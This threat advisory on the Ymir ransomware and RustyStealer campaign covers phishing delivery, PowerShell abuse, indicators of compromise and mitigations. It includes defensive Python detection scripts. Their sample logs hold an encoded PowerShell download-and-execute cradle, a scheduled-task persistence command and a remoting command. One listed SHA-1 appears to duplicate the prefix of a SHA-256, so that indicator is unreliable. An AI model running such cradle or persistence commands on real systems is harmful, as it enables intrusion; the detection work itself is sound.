Ymir and RustyStealer Malware Duo Escalates Cyber Threat Landscape

Threat Group: Unidentified Threat Actor
Threat Type: Ransomware, Info-Stealer
Exploited Vulnerabilities: Common file encryption mechanisms, credential theft techniques
Malware Used: Ymir Ransomware, RustyStealer
Threat Score: High (8.2/10) — Due to its dual-impact functionality that combines data theft with ransomware encryption.
Last Threat Observation: November 10, 2024

Overview

A newly identified ransomware variant, dubbed Ymir, has emerged in the cyber landscape, working in tandem with RustyStealer malware to maximize damage and data exploitation. First observed in early November 2024, this pairing enables attackers to both lock down systems and exfiltrate sensitive data, posing severe risks to businesses, individuals, and public sector entities. Ymir’s encryption disrupts operations, while RustyStealer collects valuable credentials and system data, broadening the threat actor's potential for further exploitation.

Key Details

  • Delivery Method: Primarily through phishing emails containing malicious links or attachments.
  • Target: Organizations with sensitive data and networked environments.
  • Functions:
    • Data Encryption: Ymir encrypts critical files, making them inaccessible.
    • Credential Theft: RustyStealer collects login credentials and system information.
    • Network Propagation: Ymir spreads through networked systems.
    • Persistence: Uses techniques to stay active on infected systems.
    • PowerShell Exploitation: Employs PowerShell scripts for execution, evasion, and spread.

How It Infects the System

Ymir and RustyStealer infections typically start with phishing emails designed to trick users into clicking malicious links or opening infected attachments, such as Office documents or PDFs. Once the file is opened, it may run a script or direct the user to download the malware, allowing both Ymir and RustyStealer to install on the system.

After gaining entry, both malware families abuse PowerShell, the scripting tool built into Windows, to execute commands, download additional payloads, and move laterally across the network. PowerShell is powerful and its activity is easily concealed, which allows attackers to:

  • Download and Execute Malware: PowerShell commands download Ymir and RustyStealer from remote servers and run them with little or nothing written to disk, making the infection "fileless" and harder for antivirus tools to detect.
  • Evasion through Obfuscation: Attackers disguise PowerShell commands, often by encoding them, so that signature-based security tools have a harder time recognizing them.
  • Establish Persistence: PowerShell is used to set up scheduled tasks or registry entries, making sure the malware remains active even after a reboot.
  • Spread within Networks: PowerShell remoting allows Ymir to reach other devices, amplifying the ransomware's impact across connected systems.
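The four PowerShell behaviours listed above are exactly what endpoint telemetry can be checked for. The script below is an added example written for this advisory, not tooling from the advisory or from any of its sources: it decodes -EncodedCommand payloads (PowerShell expects UTF-16LE text, base64-encoded), runs a small set of behavioural rules over both the raw command line and the decoded payload, and assigns a coarse severity. The record format ("timestamp host user command line"), the sample records, the host and user names, and the example.invalid URL are all constructed for the demonstration.

```python
import base64
import binascii
import re

# Any accepted spelling of -EncodedCommand followed by a base64 payload.
# PowerShell accepts unambiguous prefixes of parameter names, hence the alternation.
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Behavioural rules for the PowerShell abuses listed above. Each is matched
# case-insensitively against the raw command line and, when an encoded payload
# is present, against its decoded text as well.
RULES = {
    "encoded_command": ENCODED_RE,
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I),
    "evasion_flags": re.compile(
        r"-(?:ExecutionPolicy\s+Bypass|WindowStyle\s+Hidden|NoProfile|NonInteractive)", re.I),
    "persistence": re.compile(
        r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask|CurrentVersion\\Run\b", re.I),
    "lateral_movement": re.compile(
        r"Invoke-Command\s+-ComputerName|Enter-PSSession|New-PSSession|wmic(?:\.exe)?\s+/node", re.I),
}

# Coarse weights: -NoProfile alone is common in admin scripts, a download
# cradle hidden inside an encoded command is not. Tune these to your environment.
WEIGHTS = {"encoded_command": 2, "download_cradle": 3, "evasion_flags": 1,
           "persistence": 3, "lateral_movement": 3}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind an -EncodedCommand payload, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_command(cmdline):
    """Return (set of fired rule names, decoded payload or None) for one command line."""
    decoded = decode_encoded_command(cmdline)
    texts = [cmdline] + ([decoded] if decoded else [])
    hits = {name for name, rx in RULES.items() if any(rx.search(t) for t in texts)}
    return hits, decoded


def severity(hits):
    """Map the fired rules to a triage label."""
    score = sum(WEIGHTS[h] for h in hits)
    if score >= 5:
        return "high"
    if score >= 3:
        return "medium"
    return "low" if score else "none"


def scan_logs(lines):
    """Scan '<timestamp> <host> <user> <command line>' records; return one alert per hit."""
    alerts = []
    for index, line in enumerate(lines):
        timestamp, host, user, cmdline = line.split(" ", 3)
        hits, decoded = analyze_command(cmdline)
        if hits:
            alerts.append({"index": index, "host": host, "user": user, "hits": hits,
                           "severity": severity(hits), "decoded": decoded})
    return alerts


def _encode_for_sample(script):
    """Build a sample -EncodedCommand payload the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample records; hosts, users and the placeholder URL are made up.
SAMPLE_LOGS = [
    r"2024-11-08T09:10:00Z WS01 alice powershell.exe -Command Get-ChildItem C:\Reports",
    "2024-11-08T09:12:01Z WS01 alice powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand "
    + _encode_for_sample("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"),
    r"2024-11-08T09:12:40Z WS01 alice powershell.exe -Command schtasks /create /tn Updater /tr C:\Users\Public\svc.exe /sc onlogon",
    r"2024-11-08T09:15:03Z WS01 alice powershell.exe -Command Invoke-Command -ComputerName FS01 -ScriptBlock { Get-Service }",
]

if __name__ == "__main__":
    for alert in scan_logs(SAMPLE_LOGS):
        print(alert["severity"], alert["host"], alert["user"], sorted(alert["hits"]))
        if alert["decoded"]:
            print("  decoded:", alert["decoded"])
```

Run stand-alone, the first sample record is benign and produces no alert, the encoded download cradle scores high because three rules fire at once, and the scheduled-task and remoting records score medium. Feed it Sysmon Event ID 1 or Security 4688 command lines (or 4104 script-block text, which is already decoded) in the same record shape; the rule set is deliberately small and should be tuned to the baseline of your own administrators' scripts.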

Attack Vectors

The Ymir and RustyStealer malware combination primarily infiltrates networks through phishing emails with malicious attachments or links. Upon activation, RustyStealer immediately begins gathering sensitive data, such as login credentials and system details. Once this data is extracted, Ymir ransomware initiates file encryption, rendering local data inaccessible. The dual malware setup allows attackers to leverage both immediate and long-term threats, from credential compromise to prolonged operational downtime.

Known Indicators of Compromise (IoCs)

MD5 File Hashes

  • 12acbb05741a218a1c83eaa1cfc2401f
  • 39df773139f505657d11749804953be5
  • 5384d704fadf229d08eab696404cbba6
  • 5ee1befc69d120976a60a97d3254e9eb

SHA1 File Hashes

  • 3648359ebae8ce7cacae1e631103659f5a8c630e
  • 8287d54c83db03b8adcdf1409f5d1c9abb1693ac
  • e6c4d3e360a705e272ae0b505e58e3d928fb1387
  • f954d1b1d13a5e4f62f108c9965707a2aa2a3c89
  • fe6de75d6042de714c28c0a3c0816b37e0fa4bb3

SHA256 File Hashes

  • 51ffc0b7358b7611492ef458fdf9b97f121e49e70f86a6b53b93ed923b707a03
  • 8287d54c83db03b8adcdf1409f5d1c9abb1693ac8d000b5ae75b3a296cb3061c
  • b087e1309f3eab6302d7503079af1ad6af06d70a932f7a6ae1421b942048e28a
  • cb88edd192d49db12f444f764c3bdc287703666167a4ca8d533d51f86ba428d8

IPv4 Addresses

  • 5[.]255[.]117[.]134
  • 74[.]50[.]84[.]181
  • 85[.]239[.]61[.]60
  • 94[.]158[.]244[.]69

URLs

  • http://5[.]255[.]117[.]134:80
  • http://74[.]50[.]84[.]181:443
  • http://94[.]158[.]244[.]69:443

Hostname

  • trojan[.]msil[.]dnoper[.]sb

Mitigation and Prevention

  • User Awareness: Conduct phishing awareness training to reduce click-through rates on malicious links.
  • Email Filtering: Implement email filtering tools to block emails with suspicious attachments and URLs.
  • Antivirus Protection: Update antivirus solutions and endpoint protection systems to recognize and respond to Ymir and RustyStealer.
  • Two-Factor Authentication (2FA): Enforce 2FA on all systems to mitigate credential theft.
  • Monitor Logs: Regularly review network and endpoint logs to identify unusual access or data transfer activity.
  • Regular Updates: Ensure that all systems, including antivirus definitions, are up to date to protect against known vulnerabilities and threat signatures.
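The "Monitor Logs" recommendation is easiest to act on by sweeping existing proxy and endpoint telemetry for the indicators listed in the IoC section. The script below is an added example written for this advisory, not tooling from the advisory or its sources: it refangs the advisory's own defanged indicators (the "[.]" notation), sorts hashes by length into MD5, SHA-1 and SHA-256 buckets, and reports every log line that contains one of them. The sample proxy and EDR records, the host names, the documentation address 192.0.2.10 and the dummy MD5 value are constructed for the demonstration; only the indicator values come from the advisory.

```python
import re

# Indicators copied from the advisory above, kept in the defanged "[.]" form it uses.
ADVISORY_IOCS = """
12acbb05741a218a1c83eaa1cfc2401f
39df773139f505657d11749804953be5
5384d704fadf229d08eab696404cbba6
5ee1befc69d120976a60a97d3254e9eb
3648359ebae8ce7cacae1e631103659f5a8c630e
8287d54c83db03b8adcdf1409f5d1c9abb1693ac
e6c4d3e360a705e272ae0b505e58e3d928fb1387
f954d1b1d13a5e4f62f108c9965707a2aa2a3c89
fe6de75d6042de714c28c0a3c0816b37e0fa4bb3
51ffc0b7358b7611492ef458fdf9b97f121e49e70f86a6b53b93ed923b707a03
8287d54c83db03b8adcdf1409f5d1c9abb1693ac8d000b5ae75b3a296cb3061c
b087e1309f3eab6302d7503079af1ad6af06d70a932f7a6ae1421b942048e28a
cb88edd192d49db12f444f764c3bdc287703666167a4ca8d533d51f86ba428d8
5[.]255[.]117[.]134
74[.]50[.]84[.]181
85[.]239[.]61[.]60
94[.]158[.]244[.]69
http://5[.]255[.]117[.]134:80
http://74[.]50[.]84[.]181:443
http://94[.]158[.]244[.]69:443
"""

# Longest hash form first so a SHA-256 is never reported as a shorter prefix.
HEX_RE = re.compile(r"\b[0-9a-f]{64}\b|\b[0-9a-f]{40}\b|\b[0-9a-f]{32}\b", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HASH_KIND = {32: "md5", 40: "sha1", 64: "sha256"}


def refang(text):
    """Turn the advisory's defanged '[.]' notation back into dots for matching."""
    return text.replace("[.]", ".")


def load_iocs(text):
    """Sort indicator tokens into buckets by type; hashes are stored lower-cased."""
    iocs = {"md5": set(), "sha1": set(), "sha256": set(), "ipv4": set(), "url": set()}
    for token in refang(text).split():
        if HEX_RE.fullmatch(token):
            iocs[HASH_KIND[len(token)]].add(token.lower())
        elif IPV4_RE.fullmatch(token):
            iocs["ipv4"].add(token)
        elif token.startswith(("http://", "https://")):
            iocs["url"].add(token)
    return iocs


def match_line(line, iocs):
    """Return [(kind, value), ...] for every advisory indicator found in one log line."""
    text = refang(line)
    hits = []
    for digest in HEX_RE.findall(text):
        digest = digest.lower()
        kind = HASH_KIND[len(digest)]
        if digest in iocs[kind]:
            hits.append((kind, digest))
    for ip in IPV4_RE.findall(text):
        if ip in iocs["ipv4"]:
            hits.append(("ipv4", ip))
    for url in iocs["url"]:
        if url in text:
            hits.append(("url", url))
    return hits


def scan_logs(lines, iocs):
    """Return one alert per log line that contains at least one indicator."""
    alerts = []
    for index, line in enumerate(lines):
        hits = match_line(line, iocs)
        if hits:
            alerts.append({"index": index, "line": line, "hits": hits})
    return alerts


# Constructed sample proxy and EDR records. Hosts and the non-matching values are
# made up: 192.0.2.10 is a documentation address and the last MD5 is a dummy digest.
SAMPLE_LOGS = [
    "2024-11-09T14:02:10Z proxy src=WS07 dst=74.50.84.181:443 method=CONNECT",
    "2024-11-09T14:02:11Z proxy src=WS07 dst=192.0.2.10:443 method=CONNECT",
    "2024-11-09T14:03:22Z edr host=WS07 event=file_create sha256=b087e1309f3eab6302d7503079af1ad6af06d70a932f7a6ae1421b942048e28a",
    "2024-11-09T14:03:25Z edr host=WS07 event=file_create md5=0123456789abcdef0123456789abcdef",
]

if __name__ == "__main__":
    iocs = load_iocs(ADVISORY_IOCS)
    for alert in scan_logs(SAMPLE_LOGS, iocs):
        print(alert["index"], alert["hits"])
```

Run stand-alone, the proxy connection to 74.50.84.181 and the SHA-256 file event are reported; the documentation address and the dummy MD5 are not. Hash matching is exact, so a recompiled or repacked sample will not match: treat a hit as confirmation, not absence of a hit as a clean bill, and pair this sweep with the behavioural PowerShell checks described earlier in the advisory.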

Conclusion

The Ymir and RustyStealer malware combination represents a significant threat due to its dual capabilities of data encryption and credential theft. Organizations are advised to implement strong access controls, user awareness training, and to stay vigilant with log monitoring and regular updates. Early detection and robust email filtering are key to minimizing the risk of compromise.

Sources:

  1. The Hacker News, "New Ymir Ransomware Exploits Memory for Stealthy Attacks; Targets Corporate Networks"
  2. Rewterz, "RustyStealer and New Ymir Ransomware Collaborate in Cyberattacks – Active IOCs"
  3. Bleeping Computer, "New Ymir ransomware partners with RustyStealer in attacks"